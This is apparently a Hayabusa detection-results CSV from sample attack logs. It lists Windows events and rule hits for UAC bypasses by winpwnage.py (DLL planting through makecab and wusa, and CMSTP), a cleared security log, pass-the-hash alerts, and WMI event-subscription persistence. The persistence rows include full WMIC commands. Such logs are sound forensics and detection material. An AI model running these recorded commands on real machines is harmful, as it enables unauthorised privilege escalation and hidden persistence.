2019-05-10 22:33:29.424 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
2019-05-10 22:33:29.424 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
2019-05-10 22:49:29.586 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14241 | PID: 3552 | PGUID: 365ABB72-8169-5CD5-0000-0010D7982300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
2019-05-10 22:49:29.789 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\NTWDBLIB.dll | Process: c:\python27\python.exe | PID: 3552 | PGUID: 365ABB72-8169-5CD5-0000-0010D7982300,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
2019-05-10 22:49:29.789 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
2019-05-10 22:49:34.946 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 1700 | PGUID: 365ABB72-816E-5CD5-0000-0010FEB62300,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
2019-05-10 22:49:39.930 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x14241 | PID: 3608 | PGUID: 365ABB72-8173-5CD5-0000-00102FCD2300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
2019-05-10 22:49:40.164 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x141f8 | PID: 2676 | PGUID: 365ABB72-8174-5CD5-0000-0010ABE62300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
2019-05-10 22:49:45.133 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cliconfg.exe"" | Process: C:\Windows\System32\cliconfg.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x14241 | PID: 1052 | PGUID: 365ABB72-8179-5CD5-0000-00102CFF2300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
2019-05-10 22:49:45.378 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cliconfg.exe"" | Process: C:\Windows\System32\cliconfg.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x141f8 | PID: 880 | PGUID: 365ABB72-8179-5CD5-0000-001083182400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
2019-05-11 18:50:08.248 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x136c5 | PID: 1136 | PGUID: 365ABB72-9AD0-5CD6-0000-001077FC1600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:08.491 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 1136 | PGUID: 365ABB72-9AD0-5CD6-0000-001077FC1600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:08.491 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:13.494 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 3716 | PGUID: 365ABB72-9AD5-5CD6-0000-0010C4131700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:13.509 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 3716 | PGUID: 365ABB72-9AD5-5CD6-0000-0010C4131700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:18.404 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 2780 | PGUID: 365ABB72-9ADA-5CD6-0000-001012231700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:18.654 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1369b | PID: 3448 | PGUID: 365ABB72-9ADA-5CD6-0000-0010603C1700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:26.779 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\ehome\mcx2prov.exe"" | Process: C:\Windows\ehome\Mcx2Prov.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 2936 | PGUID: 365ABB72-9AE2-5CD6-0000-00106D631700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:27.018 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\ehome\mcx2prov.exe"" | Process: C:\Windows\ehome\Mcx2Prov.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1369b | PID: 2688 | PGUID: 365ABB72-9AE2-5CD6-0000-0010337C1700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-11 18:50:27.030 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\ehome\CRYPTBASE.dll | Process: C:\Windows\ehome\Mcx2Prov.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2688 | PGUID: 365ABB72-9AE2-5CD6-0000-0010337C1700 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
2019-05-12 01:46:10.125 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 3812 | PGUID: 365ABB72-FC52-5CD6-0000-0010357F1200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:46:10.344 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 3812 | PGUID: 365ABB72-FC52-5CD6-0000-0010357F1200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:46:10.344 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:46:15.500 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3884 | PGUID: 365ABB72-FC57-5CD6-0000-00101FAF1200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:46:15.547 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 3884 | PGUID: 365ABB72-FC57-5CD6-0000-00101FAF1200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:46:20.531 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3756 | PGUID: 365ABB72-FC5C-5CD6-0000-001045DB1200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:46:20.828 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1371b | PID: 1256 | PGUID: 365ABB72-FC5C-5CD6-0000-0010E9F61200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:46:26.203 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\migwiz\CRYPTBASE.dll | Process: C:\Windows\System32\migwiz\migwiz.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3240 | PGUID: 365ABB72-FC61-5CD6-0000-0010141A1300 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:54:02.071 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 2028 | PGUID: 365ABB72-FE2A-5CD6-0000-00107E091700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:02.305 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 2028 | PGUID: 365ABB72-FE2A-5CD6-0000-00107E091700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:02.305 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:07.508 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 2956 | PGUID: 365ABB72-FE2F-5CD6-0000-001019201700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:07.524 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 2956 | PGUID: 365ABB72-FE2F-5CD6-0000-001019201700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:12.493 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3688 | PGUID: 365ABB72-FE34-5CD6-0000-0010EB2E1700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:12.821 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1371b | PID: 4000 | PGUID: 365ABB72-FE34-5CD6-0000-0010B8481700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:18.069 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\sysprep\CRYPTBASE.dll | Process: C:\Windows\System32\sysprep\sysprep.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2572 | PGUID: 365ABB72-FE39-5CD6-0000-001012701700 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 02:10:06.342 +09:00,IEWIN7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer:  | IP Addr: ::1 | LID: 0x1bbdce | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
2019-05-12 02:28:17.176 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 2460 | PGUID: 365ABB72-0631-5CD7-0000-0010C5862100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:28:17.363 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp.ini | Process: c:\python27\python.exe | PID: 2460 | PGUID: 365ABB72-0631-5CD7-0000-0010C5862100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:28:19.567 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmstp.exe"" /au c:\users\ieuser\appdata\local\temp\tmp.ini | Process: C:\Windows\System32\cmstp.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe | LID: 0x13765 | PID: 3840 | PGUID: 365ABB72-0633-5CD7-0000-0010C6A02100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:28:19.567 +09:00,IEWIN7,1,high,PrivEsc | Evas,Bypass UAC via CMSTP,,rules/sigma/process_creation/proc_creation_win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:28:22.598 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0x1371b | PID: 544 | PGUID: 365ABB72-0636-5CD7-0000-0010A6C72100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:28:22.598 +09:00,IEWIN7,13,high,Evas | Exec,CMSTP Execution Registry Event,,rules/sigma/registry_event/sysmon_cmstp_execution_by_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:28:22.598 +09:00,IEWIN7,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:57:49.903 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -5 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 3140 | PGUID: 365ABB72-0D1D-5CD7-0000-001020EF1500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:22.809 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 1832 | PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:23.215 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer CREATE Name=""BotConsumer23"", ExecutablePath=""c:\Windows\System32\cmd.exe"", CommandLineTemplate=""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3184 | PGUID: 365ABB72-0D3F-5CD7-0000-0010DB251600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:23.340 +09:00,IEWIN7,20,info,,WMI Event Consumer Activity,"Created | Type: Command Line | Name: ""BotConsumer23"" | Dst: ""c:\\Windows\\System32\\cmd.exe"" | User: IEWIN7\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:23.418 +09:00,IEWIN7,21,info,,WMI Event Consumer To Filter Activity,"Created | Consumer: ""CommandLineEventConsumer.Name=\""BotConsumer23\"""" | Filter: ""__EventFilter.Name=\""BotFilter82\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:23.450 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name=""BotFilter82""', Consumer='CommandLineEventConsumer.Name=""BotConsumer23""' | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3196 | PGUID: 365ABB72-0D3F-5CD7-0000-00108B381600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:23.590 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter CREATE Name=""BotFilter82"", EventNameSpace=""root\cimv2"", QueryLanguage=""WQL"", Query=""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 1616 | PGUID: 365ABB72-0D3F-5CD7-0000-001089471600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:39.746 +09:00,IEWIN7,19,info,,WMI Event Filter Activity,"Created | Namespace: ""root\\cimv2"" | Name: ""BotFilter82"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | User: IEWIN7\IEUser",rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
